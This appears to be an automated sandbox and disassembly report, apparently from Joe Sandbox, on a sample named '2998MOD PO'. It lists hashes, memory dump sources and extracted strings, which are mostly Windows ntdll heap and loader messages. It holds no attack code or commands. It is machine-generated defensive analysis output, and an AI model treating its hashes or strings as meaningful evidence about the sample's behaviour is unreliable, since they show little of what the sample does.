                          • Instruction ID: 68f80ed3b4e18818095c66e6510c59f5d88b35266f4ea34fd1cc0c8ec6dcdad2
                          • Opcode Fuzzy Hash: 2287c9093f948bc318e9026c11013fac7ca4310e956e2ca6eea03648ad12d673
                          • Instruction Fuzzy Hash: 6B92AB71A042499FEF25CFACC444BAEBBF5FF48300F188499E859AB391D735AA45CB50
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                          • API String ID: 0-4253913091
                          • Opcode ID: f0cca4116e6b8535f7e00d0d7264f53dd36fb782f2b4220338210b022410b961
                          • Instruction ID: 3f65dc38b4d8bcd1ca65ad6385796eba40ef6fa60d80fb6c0dcc2c0b2df43270
                          • Opcode Fuzzy Hash: f0cca4116e6b8535f7e00d0d7264f53dd36fb782f2b4220338210b022410b961
                          • Instruction Fuzzy Hash: 72F18B34A00606DFEB16CF6CC984F6AB7F9FB84304F194569E52A9B381D734E981CB91
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: $@
                          • API String ID: 0-1077428164
                          • Opcode ID: 9d6860a2ec1ab63b971812a3adb9bb253cf7638648d840367f3a17f4fc815378
                          • Instruction ID: 972ca5e287fdeb240d412c4fb5bdb15515652419846e08d7aabec8306484045f
                          • Opcode Fuzzy Hash: 9d6860a2ec1ab63b971812a3adb9bb253cf7638648d840367f3a17f4fc815378
                          • Instruction Fuzzy Hash: D5C270716083419FDB29CF68C881BABBBE5AFC8754F44892DE9CD87241D735D809CB92
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: FilterFullPath$UseFilter$\??\
                          • API String ID: 0-2779062949
                          • Opcode ID: 2bc0600f6c125098dba0e3f246c04eed8517a169cbb2da3d91b1d9341d1cad91
                          • Instruction ID: cf0b4ea0b84afb274026637233e5bfbeb46387a716f55a0084a41659b6f8ba14
                          • Opcode Fuzzy Hash: 2bc0600f6c125098dba0e3f246c04eed8517a169cbb2da3d91b1d9341d1cad91
                          • Instruction Fuzzy Hash: EEA16B759116299BDB31DF68CC88BEAB7B8EF44B10F1041EAE90CA7250DB359E85CF50
                          Strings
                          • minkernel\ntdll\ldrinit.c, xrefs: 019EA121
                          • LdrpCheckModule, xrefs: 019EA117
                          • Failed to allocated memory for shimmed module list, xrefs: 019EA10F
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                          • API String ID: 0-161242083
                          • Opcode ID: 656d983a12fc9765c1077e013ea26505e2f4659a07b594a247a4e8cd7890b098
                          • Instruction ID: 39abcdf4f641235f1a34b14833705fd44a0fe843365ffc20b7d5f67eb305ea09
                          • Opcode Fuzzy Hash: 656d983a12fc9765c1077e013ea26505e2f4659a07b594a247a4e8cd7890b098
                          • Instruction Fuzzy Hash: DF71D274E002059FDF26DF68CD44BBEB7F8FB84604F58442DE80AA7211E734AA46CB91
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                          • API String ID: 0-1334570610
                          • Opcode ID: 7f4cf8bf385f89cdc4cbbc2b09e88f9fd3c7180e10b4ae357426f290de7b8a50
                          • Instruction ID: 0a3802d39bfa0808a22e0601ff09a4d73ab839b3686333b4ca90797f984860f4
                          • Opcode Fuzzy Hash: 7f4cf8bf385f89cdc4cbbc2b09e88f9fd3c7180e10b4ae357426f290de7b8a50
                          • Instruction Fuzzy Hash: F661C030600301DFEF29CF28C544B6ABBE9FF44308F198559E46D8B296D774E841CB91
                          Strings
                          • minkernel\ntdll\ldrinit.c, xrefs: 019F82E8
                          • LdrpInitializePerUserWindowsDirectory, xrefs: 019F82DE
                          • Failed to reallocate the system dirs string !, xrefs: 019F82D7
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                          • API String ID: 0-1783798831
                          • Opcode ID: 1f3e8e75fc5bfdd6f391b436e1d2597b584a2b0c1f7523ea414212528d783bb1
                          • Instruction ID: c1da28eb0935a056a7d169ff369f25a4382f1704f0f66bd9129ab41d0da8fd6f
                          • Opcode Fuzzy Hash: 1f3e8e75fc5bfdd6f391b436e1d2597b584a2b0c1f7523ea414212528d783bb1
                          • Instruction Fuzzy Hash: 0841E175654301ABDB21EB68DD84F9B77E8EF84B50F41492AB94CD3260E770E9018B91
                          Strings
                          • PreferredUILanguages, xrefs: 01A3C212
                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 01A3C1C5
                          • @, xrefs: 01A3C1F1
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                          • API ID:
                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                          Strings
                          • minkernel\ntdll\ldrredirect.c, xrefs: 01A04899
                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01A04888
                          • LdrpCheckRedirection, xrefs: 01A0488F
                          • API ID:
                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                          • API ID:
                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                          Strings
                          • LdrpInitializationFailure, xrefs: 01A020FA
                          • minkernel\ntdll\ldrinit.c, xrefs: 01A02104
                          • Process initialization failed with status 0x%08lx, xrefs: 01A020F3
                          • API ID:
                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                          • API ID: ___swprintf_l
                          • String ID: #%u
                          Strings
                          • LdrResSearchResource Exit, xrefs: 0198AA25
                          • LdrResSearchResource Enter, xrefs: 0198AA13
                          • API ID:
                          • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                          • API ID:
                          • String ID: `$`
                          • API ID: InitializeThunk
                          • String ID: Legacy$UEFI
                          • API ID:
                          • String ID: @$MUI
                          Strings
                          • kLsE, xrefs: 01980540
                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0198063D
                          • API ID:
                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                          Strings
                          • RtlpResUltimateFallbackInfo Exit, xrefs: 0198A309
                          • RtlpResUltimateFallbackInfo Enter, xrefs: 0198A2FB
                          • API ID:
                          • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                          • API ID: InitializeThunk
                          • String ID: Cleanup Group$Threadpool!
                          • API ID:
                          • String ID: MUI
                          • API ID:
                          • String ID: GlobalTags
                          • API ID:
                          • String ID: .mui
                          • API ID:
                          • String ID: EXT-
                          • API ID:
                          • String ID: BinaryHash
                          • API ID:
                          • String ID: #
                          • API ID:
                          • String ID: BinaryName
                          Strings
                          • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 01A0895E
                          • API ID:
                          • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                          • Instruction Fuzzy Hash: 0BB19274E00705AFDF26DF98D940AABBBB9FF88304F10442DAA12977D5DA38E905CB14
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                          • Instruction ID: 42c5c4eb3653642ad46398921fd1ba9a3b40008c93126053196e1382bdba2f28
                          • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                          • Instruction Fuzzy Hash: A7B10831600646EFDF16CB6DC854BBEBBFAAF84300F194559E66AD7281D730E941CB90
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7b59b691fd3a2b95e7a3f5ee2cae5080d8189613fdf416eeea792af58155bc6a
                          • Instruction ID: db6e6ecba58e26da1e89be1bf6278ed5255760698ae9848f106a95b499b7137f
                          • Opcode Fuzzy Hash: 7b59b691fd3a2b95e7a3f5ee2cae5080d8189613fdf416eeea792af58155bc6a
                          • Instruction Fuzzy Hash: A9C17774608341CFE764DF18C494BABB7E9BF88704F44496DE98987291E774E908CFA2
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3a7ca87d03a1664a3f1af3b1bc17c4da8507dec37f057ea605fb81e5fe79a569
                          • Instruction ID: 20d49516880d82d35f72b74405e95ed15b84d5d0c4cb948e7b764c7c9a532f7d
                          • Opcode Fuzzy Hash: 3a7ca87d03a1664a3f1af3b1bc17c4da8507dec37f057ea605fb81e5fe79a569
                          • Instruction Fuzzy Hash: C1B17170A042668BDB24CF68C890BADB7F5EF84704F0485E9D54EEB281EB71DD85CB21
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0b1f9ecdd063dfc6b95d08ae43213937f5fa03ba9696bf7dd90b6a9e58d9f5d5
                          • Instruction ID: cce3aa701a8432023a6778e59d04f234af9f2983aab7787311fbd7b54b975db7
                          • Opcode Fuzzy Hash: 0b1f9ecdd063dfc6b95d08ae43213937f5fa03ba9696bf7dd90b6a9e58d9f5d5
                          • Instruction Fuzzy Hash: 6DA12731E006199FEB22DB6CC848FAEBBF8AF44714F150526EA08AB2D1D7749D45CBD1
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7576651b1b23b81f8fdb9f339b2d7ab629c798906ce8c8e771f9cd161c3306c0
                          • Instruction ID: d4c18b36dcb4a327f106e48ddd4dbf69dd9f00be7afca377a87a9fa89b26c9f0
                          • Opcode Fuzzy Hash: 7576651b1b23b81f8fdb9f339b2d7ab629c798906ce8c8e771f9cd161c3306c0
                          • Instruction Fuzzy Hash: 0AA1D374B00616DFDB25DF69C890BAAB7B5FF44B19F08402DFA8997281EB34E811CB51
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e5bc63a0c2f5ce3a51c7aaa23dd1d9000149ce8461a12e2e093d2845205033f2
                          • Instruction ID: c9ec52302627d4c70c2d0d096cf50beb193ffeab8ae59e4403fb4b8452cf5bab
                          • Opcode Fuzzy Hash: e5bc63a0c2f5ce3a51c7aaa23dd1d9000149ce8461a12e2e093d2845205033f2
                          • Instruction Fuzzy Hash: 2FA1D172A08601EFD756DF28C980B5ABBE9FF98704F450528F989D7651E330ED81CB91
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a5abfc3457a10a3b9285358babfbde0256225f41577da06d0e5e8a8ce1384616
                          • Instruction ID: 72061d19e3558a89491193d999b1eb9870b306dcca3037864bbd26f3539b33d0
                          • Opcode Fuzzy Hash: a5abfc3457a10a3b9285358babfbde0256225f41577da06d0e5e8a8ce1384616
                          • Instruction Fuzzy Hash: D791A471D00216AFDF16CFA8E894BBEBFB5AF48714F154169E618EB381D734D9108BA0
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 523a35a2b8f32b1c134cd9bcf0974bd775b40aea591e70535eb8ab807fec2844
                          • Instruction ID: 53b7b61829ded20f7224a6a97a8168a374f17e1f9db4747fa993cc4414d616dc
                          • Opcode Fuzzy Hash: 523a35a2b8f32b1c134cd9bcf0974bd775b40aea591e70535eb8ab807fec2844
                          • Instruction Fuzzy Hash: 8A914131A00616DBEF25DB2DC884BBEBBE5FF94B15F048469E90D9B380E634D901C792
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 65121568c5e93cd2ff0af48615c9511f36aa46997b94e9210c45560d280151ae
                          • Instruction ID: 39e0e4c88883144a016e19081dba6d132a4a447b937abe4b9a598b776dddd0b0
                          • Opcode Fuzzy Hash: 65121568c5e93cd2ff0af48615c9511f36aa46997b94e9210c45560d280151ae
                          • Instruction Fuzzy Hash: E881A571E006169FDB15CFA9D950ABEBBF9FB48700F04852EE949E7640E334E941CBA4
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                          • Instruction ID: 4d2f3d3647546e3688c8ad2a6fa7c5b1350f0f564d1004e2ee626c394f01e985
                          • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                          • Instruction Fuzzy Hash: 96819071A002099FDF19CF99C880ABEBBB6FFC8310F188569D9169B345D774E905CB54
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 63d53e92217fb6666d7c4289e3dab190cf97c13676ee17ce7fac7bd31330711c
                          • Instruction ID: 37f86383df437596c6c9bd7156e38665870e5be0ebf637d3ff50b90f0ae05f4a
                          • Opcode Fuzzy Hash: 63d53e92217fb6666d7c4289e3dab190cf97c13676ee17ce7fac7bd31330711c
                          • Instruction Fuzzy Hash: 81815E71A00609AFDB25DFA9C980BEEBBBEFF88354F14442DE559A7250D730AC45CB60
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7b2d6c1866a817cca4869bd1bda2d95f261cf1d674dd99e824b2a269da3a6706
                          • Instruction ID: 3511b28d0609ea3d9d43f9eb17940e044c9658d6ad2a1effc2f319282b4c431e
                          • Opcode Fuzzy Hash: 7b2d6c1866a817cca4869bd1bda2d95f261cf1d674dd99e824b2a269da3a6706
                          • Instruction Fuzzy Hash: 0E71C175C00665DBDB26CF98C890BBEBBF4FF48711F14451AE84AAB350D331A941CBA0
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8faf85731479ed25d206b3c6d7c3d2e914072cd14202f212684585065ad14526
                          • Instruction ID: 9a682299db6c2560f41f774fe7206178666603cd959cb210a786ab591a6d5f66
                          • Opcode Fuzzy Hash: 8faf85731479ed25d206b3c6d7c3d2e914072cd14202f212684585065ad14526
                          • Instruction Fuzzy Hash: BB7192B4E00605EFEB20CF59CE44B9ABBF8EFD8300F14415AF6489B259C7318A4ACB54
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 796684eb0c673ea12be9924b050288d4d6d26921e47a095166af6ee312f92b69
                          • Instruction ID: 28be1ac61318c55f51c4da7ffeb9ef9ac7c40d5a5b50cac1ee2c792cd829bc54
                          • Opcode Fuzzy Hash: 796684eb0c673ea12be9924b050288d4d6d26921e47a095166af6ee312f92b69
                          • Instruction Fuzzy Hash: C671B0356042429FD712DF2CC484B2AB7E9FF88311F0485AAE899CB752DB34E946CB91
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                          • Instruction ID: 1385d3cd1163fdb48fed074d2f9eb18394b8e0bdcd18c09a04a079783a068f71
                          • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                          • Instruction Fuzzy Hash: 8A716D71E00619AFDB11DFA9DA84BDEBBB8FF88744F104569E505E7290DB34EA01CB90
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4fb9487b285a021a899576dfe8367b2e062aa086c1e0510d6a34fb1f475a7320
                          • Instruction ID: 5f7e203e1eb5ded7c21e7cb7079b7aea1496b4dfdde0de119afa15b5d6f12904
                          • Opcode Fuzzy Hash: 4fb9487b285a021a899576dfe8367b2e062aa086c1e0510d6a34fb1f475a7320
                          • Instruction Fuzzy Hash: E871F332240B01AFEB32DF18C944F56BBB6EF84760F154828E65EC72A5DBB5E944CB50
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 84444573aaa95e176307b6539fe20d73843af6da4c2bf830ed1af7fd6313e9d5
                          • Instruction ID: 042475076a8ac0399803cecd8ea4bc78c1444e80e079f3b9b729e1935afde8fb
                          • Opcode Fuzzy Hash: 84444573aaa95e176307b6539fe20d73843af6da4c2bf830ed1af7fd6313e9d5
                          • Instruction Fuzzy Hash: 4381C172A04306CFDB29DF98D888B6DB7F9BF88711F554129D908AB385C7749E41CBA0
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ebb21524c1e6f94728de301a9beb21b21daf92c3342816073344ab2bd84d04a0
                          • Instruction ID: 84d91d64000ba9686d78ddd97c0ee6d49c6ba545e5278985cd36d6e5a8dfabe9
                          • Opcode Fuzzy Hash: ebb21524c1e6f94728de301a9beb21b21daf92c3342816073344ab2bd84d04a0
                          • Instruction Fuzzy Hash: D5619E71A00206EFDB19DFA8C980AAEB7B9FF49314F14456EE619EB291DB30D901CB50
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6a69dcc1922241e052a3699f4bfb5a5469a2d4ecc1fd142cc4c93543990059e7
                          • Instruction ID: 9f71d1830d2604fece8f8002e91358b1c285e1a5f805d460ebf3853731910026
                          • Opcode Fuzzy Hash: 6a69dcc1922241e052a3699f4bfb5a5469a2d4ecc1fd142cc4c93543990059e7
                          • Instruction Fuzzy Hash: 9751AD72504622AFD712DB68C844F5BB7E8EBC8B50F014929BA85DB150E670ED0587A2
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e22b39817f2eb7c1ad6b929f352c511713298ff7c84f137c9a2a5593bcdfc4e1
                          • Instruction ID: 882a1792d9a34cd945e37506808e5746927a61c2400e9cb9074323fd3ac55a54
                          • Opcode Fuzzy Hash: e22b39817f2eb7c1ad6b929f352c511713298ff7c84f137c9a2a5593bcdfc4e1
                          • Instruction Fuzzy Hash: E351BF726047029FD722DF68D840BAABBE5FFC4350F04892CF98597291D738E909CB96
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 850d758e6a6cf2784dbabe606ff1fab5b59290e14b4fcc60dbfa1f079e4f87e6
                          • Instruction ID: 030ae1143ebd7965a538da86a596d7403db3e7da1a8b7d2f90780d8af18cbece
                          • Opcode Fuzzy Hash: 850d758e6a6cf2784dbabe606ff1fab5b59290e14b4fcc60dbfa1f079e4f87e6
                          • Instruction Fuzzy Hash: 8D51D070900715DFD721CFAEC880AABFBF8BF94710F10461EE296976A1C7B4A545CB90
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 864feba2d6df83f5f6747af5ed711d63a1fc52c572bce1321125f04b1afcde00
                          • Instruction ID: 2877cc779c836a2ce3152b884c42fdb329268aad9eb56f053cb41f9e8d2d5193
                          • Opcode Fuzzy Hash: 864feba2d6df83f5f6747af5ed711d63a1fc52c572bce1321125f04b1afcde00
                          • Instruction Fuzzy Hash: D4514D71600A45AFDB22EF69CAC0FAAB3BDFF54744F40046DE64A97260E734EA45CB50
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a6071b6bc843c2e7395c8a77699f0f8efd6ac5ace64f32b74a7f86d6220a87f9
                          • Instruction ID: d264ed65d80fdcb06dfde13fd465d2b9e7fd30a95c0fb287c07f477ae9a64ea8
                          • Opcode Fuzzy Hash: a6071b6bc843c2e7395c8a77699f0f8efd6ac5ace64f32b74a7f86d6220a87f9
                          • Instruction Fuzzy Hash: 365188716083529FD754DF2DC880A6BBBE5BFC8608F44492DF989C7250EB30D905CB96
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                          • Instruction ID: f407ece48205cb442474db2b027a5ef6bdc11d0049922a5821f0bb33818a22f4
                          • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                          • Instruction Fuzzy Hash: A051AF75E0025AABDF16DF98C440BEEBFB9AF44750F484069EA09AB250D774DD48CBE0
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                          • Instruction ID: 2b76b79c842a1ca8c7c378d22180fadf1437e484eda30bd5a0df452141cce8fb
                          • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                          • Instruction Fuzzy Hash: 5051F971D0060AEFEF22DF94D880FAEBB74AF45324F158A69D516671D0D7309E40EBA0
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a57556696999c9f212a150675174fb49218d14fe048966cee853b70d8a8b7e81
                          • Instruction ID: 2bccc2faad1d059cace05906591266b76939c595578a58731e602252507fa781
                          • Opcode Fuzzy Hash: a57556696999c9f212a150675174fb49218d14fe048966cee853b70d8a8b7e81
                          • Instruction Fuzzy Hash: 6641F5707016119FE729DBADE994B7FBB9AEFD0220F088219E915C7281DB3CD842C691
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
